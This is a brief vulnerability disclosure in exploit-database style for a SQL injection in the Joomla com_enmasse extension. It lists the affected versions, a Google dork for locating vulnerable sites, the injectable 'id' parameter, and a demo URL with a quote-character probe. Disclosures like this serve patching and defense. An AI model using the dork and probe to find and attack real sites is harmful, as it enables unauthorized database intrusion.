# Exploit Title: Joomla com_enmasse - SQL Injection # Author: [ Hamed Izadi ] #IRAN # Vendor Homepage : http://extensions.joomla.org/extensions/extension/social-web/social-buy/en-masse # Category: [ Webapps ] # Tested on: [ Win ] # Versions: 5.1-6.4 # Date: 2016/06/15 # Google Dork: inurl:component/enmasse/ # PoC: # id Parameter Vulnerable To SQL # Demo: # http://example.com/component/enmasse/term?tmpl=component&id=2%27 # Youtube: https://youtu.be/LB5qVnXhzXE # L u Arg